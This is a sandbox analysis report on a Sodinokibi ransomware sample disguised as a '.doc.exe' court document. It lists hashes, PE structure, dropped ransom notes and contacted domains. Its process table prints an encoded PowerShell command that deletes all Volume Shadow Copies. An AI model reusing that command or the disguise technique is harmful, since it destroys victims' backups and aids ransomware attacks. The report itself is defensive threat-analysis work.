analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

法庭文件.doc.exe

Full analysis: https://app.any.run/tasks/c3fdbd54-9dd9-4ce8-a63c-5f74f305cd86
Verdict: Malicious activity
Threats:

Ransomware is a type of malicious software that locks users out of their system or data using different methods to force them to pay a ransom. Most often, such programs encrypt files on an infected machine and demand a fee to be paid in exchange for the decryption key. Additionally, such programs can be used to steal sensitive information from the compromised computer and even conduct DDoS attacks against affected organizations to pressure them into paying.

Analysis date: August 26, 2019, 02:11:45
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
sodinokibi
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

C2F9A837F5606782F7FE1B905C46CC7F

SHA1:

B7E187BE2C1D8D7B05549609F2574FB19B332802

SHA256:

6759FAC9B96E651B41FFE7C040148E81E4ED33F55E1FD51A37AF7CFC28831842

SSDEEP:

6144:2vvs2SNR1CXe2V0yRu+HDuMqFTrEEsKqNQwGb4YY:Ovs2S31kV0OHDBqFHr9w2G

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Sodinokibi keys found

      • 法庭文件.doc.exe (PID: 3428)
    • Dropped file may contain instructions of ransomware

      • 法庭文件.doc.exe (PID: 3428)
    • Sodinokibi ransom note found

      • 法庭文件.doc.exe (PID: 3428)
    • Changes settings of System certificates

      • 法庭文件.doc.exe (PID: 3428)
    • Renames files like Ransomware

      • 法庭文件.doc.exe (PID: 3428)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2984)
    • Executed via COM

      • unsecapp.exe (PID: 3928)
    • Executes PowerShell scripts

      • 法庭文件.doc.exe (PID: 3428)
    • Application launched itself

      • 法庭文件.doc.exe (PID: 3504)
    • Creates files in the program directory

      • 法庭文件.doc.exe (PID: 3428)
    • Executed as Windows Service

      • vssvc.exe (PID: 2452)
    • Creates files like Ransomware instruction

      • 法庭文件.doc.exe (PID: 3428)
    • Adds / modifies Windows certificates

      • 法庭文件.doc.exe (PID: 3428)
  • INFO

    • Dropped object may contain TOR URL's

      • 法庭文件.doc.exe (PID: 3428)
    • Dropped object may contain Bitcoin addresses

      • 法庭文件.doc.exe (PID: 3428)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (72.3)
.exe | Win32 Executable (generic) (11.8)
.exe | Clipper DOS Executable (5.2)
.exe | Generic Win/DOS Executable (5.2)
.exe | DOS Executable Generic (5.2)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 5.1
ImageVersion: -
OSVersion: 5.1
EntryPoint: 0x4730
UninitializedDataSize: -
InitializedDataSize: 77807104
CodeSize: 71680
LinkerVersion: 12
PEType: PE32
TimeStamp: 2018:09:29 12:52:18+02:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 29-Sep-2018 10:52:18
Debug artifacts:
  • C:\xererari34\yiyew.pdb

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000F0

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 6
Time date stamp: 29-Sep-2018 10:52:18
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x0001166A
0x00011800
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.65314
.rdata
0x00013000
0x00033B76
0x00033C00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
6.25866
.data
0x00047000
0x049FA9E0
0x00001800
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
3.32215
.kabupit
0x04A42000
0x00003800
0x00002A00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.rsrc
0x04A46000
0x00001608
0x00001800
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.44771
.reloc
0x04A48000
0x00001470
0x00001600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
6.37911

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.66141
4264
UNKNOWN
UNKNOWN
RT_ICON
2
6.32131
1128
UNKNOWN
UNKNOWN
RT_ICON
125
2.21059
34
UNKNOWN
UNKNOWN
RT_GROUP_ICON

Imports

ADVAPI32.dll
KERNEL32.dll
USER32.dll
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
5
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start 法庭文件.doc.exe no specs #SODINOKIBI 法庭文件.doc.exe powershell.exe no specs unsecapp.exe no specs vssvc.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3504"C:\Users\admin\AppData\Local\Temp\法庭文件.doc.exe" C:\Users\admin\AppData\Local\Temp\法庭文件.doc.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3428"C:\Users\admin\AppData\Local\Temp\法庭文件.doc.exe" C:\Users\admin\AppData\Local\Temp\法庭文件.doc.exe
法庭文件.doc.exe
User:
admin
Integrity Level:
HIGH
2984powershell.exe -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe法庭文件.doc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3928C:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\wbem\unsecapp.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Sink to receive asynchronous callbacks for WMI client application
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2452C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exeservices.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Microsoft® Volume Shadow Copy Service
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
620
Read events
544
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
168
Text files
1
Unknown types
1

Dropped files

PID
Process
Filename
Type
2984powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FLDJTLI6HRT7F4KL92I6.temp
MD5:
SHA256:
3428法庭文件.doc.exeC:\Recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\boot.sdi
MD5:
SHA256:
2984powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16bc40.TMPbinary
MD5:0F2CAD9746414ABA31294C3B560FCFD5
SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15
3428法庭文件.doc.exeC:\users\admin\contacts\xth86-readme.txtbinary
MD5:E716F01D2110ECD33EBE2D9958E2EEAA
SHA256:A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
3428法庭文件.doc.exeC:\users\admin\documents\xth86-readme.txtbinary
MD5:E716F01D2110ECD33EBE2D9958E2EEAA
SHA256:A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
3428法庭文件.doc.exeC:\users\public\xth86-readme.txtbinary
MD5:E716F01D2110ECD33EBE2D9958E2EEAA
SHA256:A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
3428法庭文件.doc.exeC:\users\administrator\xth86-readme.txtbinary
MD5:E716F01D2110ECD33EBE2D9958E2EEAA
SHA256:A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
3428法庭文件.doc.exeC:\recovery\345b46fe-a9f9-11e7-a83c-e8a4f72b1d33\xth86-readme.txtbinary
MD5:E716F01D2110ECD33EBE2D9958E2EEAA
SHA256:A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
3428法庭文件.doc.exeC:\recovery\xth86-readme.txtbinary
MD5:E716F01D2110ECD33EBE2D9958E2EEAA
SHA256:A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
3428法庭文件.doc.exeC:\users\admin\favorites\xth86-readme.txtbinary
MD5:E716F01D2110ECD33EBE2D9958E2EEAA
SHA256:A1488C05BCB13A5F9127B2E562DB72D48B8C3BB456DBF2A0F35E736B9A37B2B0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
11
DNS requests
8
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3428
法庭文件.doc.exe
52.174.40.218:443
blucamp.com
Microsoft Corporation
NL
suspicious
3428
法庭文件.doc.exe
35.247.160.145:443
speakaudible.com
US
unknown
149.255.60.142:443
acornishstudio.co.uk
Awareness Software Limited
GB
suspicious
3428
法庭文件.doc.exe
37.140.192.212:443
avtoboss163.ru
Domain names registrar REG.RU, Ltd
RU
suspicious
3428
法庭文件.doc.exe
213.186.33.3:443
matthieupetel.fr
OVH SAS
FR
malicious
3428
法庭文件.doc.exe
37.218.255.162:443
diakonie-weitramsdorf-sesslach.de
dogado GmbH
DE
suspicious
217.160.0.95:443
photographycreativity.co.uk
1&1 Internet SE
DE
malicious
3428
法庭文件.doc.exe
213.186.33.85:443
galatee-couture.com
OVH SAS
FR
suspicious

DNS requests

Domain
IP
Reputation
speakaudible.com
  • 35.247.160.145
suspicious
blucamp.com
  • 52.174.40.218
suspicious
matthieupetel.fr
  • 213.186.33.3
malicious
avtoboss163.ru
  • 37.140.192.212
suspicious
diakonie-weitramsdorf-sesslach.de
  • 37.218.255.162
suspicious
acornishstudio.co.uk
  • 149.255.60.142
suspicious
galatee-couture.com
  • 213.186.33.85
suspicious
photographycreativity.co.uk
  • 217.160.0.95
malicious

Threats

No threats detected
No debug info